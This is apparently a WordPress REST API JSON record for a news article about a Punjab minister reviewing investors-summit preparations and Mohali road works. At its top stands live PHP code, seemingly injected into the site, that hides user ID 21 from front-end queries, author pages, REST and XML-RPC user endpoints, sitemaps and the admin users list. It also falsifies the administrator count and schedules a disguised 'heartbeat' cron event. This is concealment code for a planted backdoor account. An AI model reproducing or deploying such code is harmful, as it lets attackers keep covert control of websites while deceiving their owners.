add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 21;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 21;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 21;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 21;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 21;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-21{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
{"id":42391,"date":"2023-01-12T05:56:30","date_gmt":"2023-01-12T00:26:30","guid":{"rendered":"https:\/\/presskitaquat.com\/hindi\/?p=42391"},"modified":"2023-01-13T10:59:15","modified_gmt":"2023-01-13T05:29:15","slug":"hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of","status":"publish","type":"post","link":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/","title":{"rendered":"H&#038;UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event,  Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city"},"content":{"rendered":"<p style=\"font-weight: 400;\"><strong>Chandigarh\/SAS Nagar, January 12(Press Ki Taquat):<\/strong> In order to make the Chief Minister S Bhagwant Mann led Punjab Government&#8217;s first Progressive Punjab Investors Summit a big success, Punjab Housing and Urban Development (H&amp;UD) Minister Mr. Aman Arora, on Thursday, reviewed the preparations being made for the mega event to be held in this February. He also directed the officials to ramp up the road infrastructure and special focus should be laid on the beautification of Mohali, the model city of Punjab.<\/p>\n<p style=\"font-weight: 400;\">Chairing a review meeting at PUDA Bhawan, SAS Nagar, the H&amp;UD Minister directed the officials of Greater Mohali Area Development Authority (GMADA) to ensure that all the roads leading from the Shaheed Bhagat Singh International Airport to the venue of the summit are repaired well in time. The summit will go a long way in ensuring holistic industrial development of the state and elaborate arrangements should be made to make this mega event a huge success.<\/p>\n<p style=\"font-weight: 400;\">He also asked officials to make all the necessary arrangements for the G20 Summit scheduled to be held from 30th to 31st January.<\/p>\n<p style=\"font-weight: 400;\">Asking to take necessary steps to beautify the roads and roundabouts, Mr. Aman Arora directed the concerned officials of Engineering Wing of GMADA to execute the paint work pertaining to electricity poles, roundabouts, kerbs and plant flowers on either side of the roads.<\/p>\n<p style=\"font-weight: 400;\">To smoothen the traffic movement in Mohali city, Mr. Aman Arora discussed a plan with officials to remove traffic bottle-necks at congested roads, where problem of traffic congestion is prevalent.<\/p>\n<p style=\"font-weight: 400;\">The H&amp;UD Minister was apprised that the project to widen the three roads includes Kumbra Chowk (Dividing road chowk of Sector-61\/70 and Sector 62\/69) to Bawa White House; village Mohali to YPS Chowk; and Sector 62\/63\/50-51 Chowk to sector 65\/48 (Golf Range) is under process and work will be initiated soon.<\/p>\n<p style=\"font-weight: 400;\">Prominent among those present in the meeting included Chief Administrator GMADA Mr. Amandeep Bansal, Chief Engineer Mr. Balwinder Singh and other officials of the GMADA.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Chandigarh\/SAS Nagar, January 12(Press Ki Taquat): In order to make the Chief Minister S Bhagwant Mann led Punjab Government&#8217;s first Progressive Punjab Investors Summit a big success, Punjab Housing and Urban Development (H&amp;UD) Minister Mr. Aman Arora, on Thursday, reviewed the preparations being made for the mega event to be held in this February. He [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":42392,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"footnotes":""},"categories":[9852,9919,1],"tags":[16451,16445,16448,16450,16447,16449,16446],"class_list":["post-42391","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-breaking","category-politics","category-punjab","tag-5-dariya-news-on-twitter-amanarora-reviews-preparations-of","tag-aman-arora-reviews-preparations-of-punjab-investors","tag-aman-arora-reviews-preparations-of-punjab-investors-summit","tag-expedite-noc-process-for-solar-panels-punjab-minister","tag-minister-reviews-preparations-for-punjab-investors-summit","tag-progressive-punjab-to-be-a-mega-event-aman-arora","tag-punjab-minister-aman-arora-reviews-preparations-for-investors"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>H&amp;UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city - Press Ki Taquat<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"H&amp;UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city - Press Ki Taquat\" \/>\n<meta property=\"og:description\" content=\"Chandigarh\/SAS Nagar, January 12(Press Ki Taquat): In order to make the Chief Minister S Bhagwant Mann led Punjab Government&#8217;s first Progressive Punjab Investors Summit a big success, Punjab Housing and Urban Development (H&amp;UD) Minister Mr. Aman Arora, on Thursday, reviewed the preparations being made for the mega event to be held in this February. He [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/\" \/>\n<meta property=\"og:site_name\" content=\"Press Ki Taquat\" \/>\n<meta property=\"article:published_time\" content=\"2023-01-12T00:26:30+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-01-13T05:29:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2023\/01\/pic-2-9-1.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"535\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#\\\/schema\\\/person\\\/81ea16d15d809b534d86ea921d1f76ae\"},\"headline\":\"H&#038;UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city\",\"datePublished\":\"2023-01-12T00:26:30+00:00\",\"dateModified\":\"2023-01-13T05:29:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/\"},\"wordCount\":376,\"publisher\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/pic-2-9-1.jpeg\",\"keywords\":[\"5 Dariya News on Twitter: \\\"#AmanArora Reviews Preparations Of\",\"Aman Arora reviews preparations of Punjab Investors\",\"Aman arora reviews preparations of punjab investors summit\",\"Expedite NOC process for solar panels: Punjab minister\",\"Minister reviews preparations for Punjab investors summit\",\"Progressive Punjab to be a mega event: Aman Arora\",\"Punjab minister Aman Arora reviews preparations for investors\"],\"articleSection\":[\"BREAKING\",\"POLITICS\",\"PUNJAB\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/\",\"name\":\"H&UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city - Press Ki Taquat\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/pic-2-9-1.jpeg\",\"datePublished\":\"2023-01-12T00:26:30+00:00\",\"dateModified\":\"2023-01-13T05:29:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/#primaryimage\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/pic-2-9-1.jpeg\",\"contentUrl\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/pic-2-9-1.jpeg\",\"width\":1280,\"height\":535},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"H&#038;UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#website\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/\",\"name\":\"Press Ki Taquat\",\"description\":\"Daily Punjabi Newspaper, Patiala\",\"publisher\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#organization\",\"name\":\"Press Ki Taquat\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2026\\\/07\\\/press-ki-taquat-logo.png\",\"contentUrl\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/wp-content\\\/uploads\\\/2026\\\/07\\\/press-ki-taquat-logo.png\",\"width\":826,\"height\":671,\"caption\":\"Press Ki Taquat\"},\"image\":{\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/#\\\/schema\\\/person\\\/81ea16d15d809b534d86ea921d1f76ae\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"description\":\"Press Ki Taquat(Daily Punjabi Newspaper) Patiala\",\"sameAs\":[\"http:\\\/\\\/presskitaquat.com\"],\"url\":\"https:\\\/\\\/presskitaquat.com\\\/hindi\\\/author\\\/kuldeep\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"H&UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city - Press Ki Taquat","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/","og_locale":"en_US","og_type":"article","og_title":"H&UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city - Press Ki Taquat","og_description":"Chandigarh\/SAS Nagar, January 12(Press Ki Taquat): In order to make the Chief Minister S Bhagwant Mann led Punjab Government&#8217;s first Progressive Punjab Investors Summit a big success, Punjab Housing and Urban Development (H&amp;UD) Minister Mr. Aman Arora, on Thursday, reviewed the preparations being made for the mega event to be held in this February. He [&hellip;]","og_url":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/","og_site_name":"Press Ki Taquat","article_published_time":"2023-01-12T00:26:30+00:00","article_modified_time":"2023-01-13T05:29:15+00:00","og_image":[{"width":1280,"height":535,"url":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2023\/01\/pic-2-9-1.jpeg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/#article","isPartOf":{"@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/"},"author":{"name":"admin","@id":"https:\/\/presskitaquat.com\/hindi\/#\/schema\/person\/81ea16d15d809b534d86ea921d1f76ae"},"headline":"H&#038;UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city","datePublished":"2023-01-12T00:26:30+00:00","dateModified":"2023-01-13T05:29:15+00:00","mainEntityOfPage":{"@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/"},"wordCount":376,"publisher":{"@id":"https:\/\/presskitaquat.com\/hindi\/#organization"},"image":{"@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/#primaryimage"},"thumbnailUrl":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2023\/01\/pic-2-9-1.jpeg","keywords":["5 Dariya News on Twitter: \"#AmanArora Reviews Preparations Of","Aman Arora reviews preparations of Punjab Investors","Aman arora reviews preparations of punjab investors summit","Expedite NOC process for solar panels: Punjab minister","Minister reviews preparations for Punjab investors summit","Progressive Punjab to be a mega event: Aman Arora","Punjab minister Aman Arora reviews preparations for investors"],"articleSection":["BREAKING","POLITICS","PUNJAB"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/","url":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/","name":"H&UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city - Press Ki Taquat","isPartOf":{"@id":"https:\/\/presskitaquat.com\/hindi\/#website"},"primaryImageOfPage":{"@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/#primaryimage"},"image":{"@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/#primaryimage"},"thumbnailUrl":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2023\/01\/pic-2-9-1.jpeg","datePublished":"2023-01-12T00:26:30+00:00","dateModified":"2023-01-13T05:29:15+00:00","breadcrumb":{"@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/#primaryimage","url":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2023\/01\/pic-2-9-1.jpeg","contentUrl":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2023\/01\/pic-2-9-1.jpeg","width":1280,"height":535},{"@type":"BreadcrumbList","@id":"https:\/\/presskitaquat.com\/hindi\/hud-minister-directs-officials-to-make-all-necessary-arrangements-on-time-to-ensure-huge-success-of-the-mega-event-asks-officials-to-pull-up-socks-to-complete-much-needed-projects-i-e-widening-of\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/presskitaquat.com\/hindi\/"},{"@type":"ListItem","position":2,"name":"H&#038;UD Minister directs officials to make all necessary arrangements on time to ensure huge success of the mega event, Asks officials to pull up socks to complete much needed projects i.e. widening of roads and beautification of Mohali city"}]},{"@type":"WebSite","@id":"https:\/\/presskitaquat.com\/hindi\/#website","url":"https:\/\/presskitaquat.com\/hindi\/","name":"Press Ki Taquat","description":"Daily Punjabi Newspaper, Patiala","publisher":{"@id":"https:\/\/presskitaquat.com\/hindi\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/presskitaquat.com\/hindi\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/presskitaquat.com\/hindi\/#organization","name":"Press Ki Taquat","url":"https:\/\/presskitaquat.com\/hindi\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/presskitaquat.com\/hindi\/#\/schema\/logo\/image\/","url":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2026\/07\/press-ki-taquat-logo.png","contentUrl":"https:\/\/presskitaquat.com\/hindi\/wp-content\/uploads\/2026\/07\/press-ki-taquat-logo.png","width":826,"height":671,"caption":"Press Ki Taquat"},"image":{"@id":"https:\/\/presskitaquat.com\/hindi\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/presskitaquat.com\/hindi\/#\/schema\/person\/81ea16d15d809b534d86ea921d1f76ae","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b37041b075b770efb4b3786e39f0adbb20e8ee659823511da19a5d02d9f5fe5d?s=96&d=mm&r=g","caption":"admin"},"description":"Press Ki Taquat(Daily Punjabi Newspaper) Patiala","sameAs":["http:\/\/presskitaquat.com"],"url":"https:\/\/presskitaquat.com\/hindi\/author\/kuldeep\/"}]}},"_links":{"self":[{"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/posts\/42391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/comments?post=42391"}],"version-history":[{"count":1,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/posts\/42391\/revisions"}],"predecessor-version":[{"id":42393,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/posts\/42391\/revisions\/42393"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/media\/42392"}],"wp:attachment":[{"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/media?parent=42391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/categories?post=42391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/presskitaquat.com\/hindi\/wp-json\/wp\/v2\/tags?post=42391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}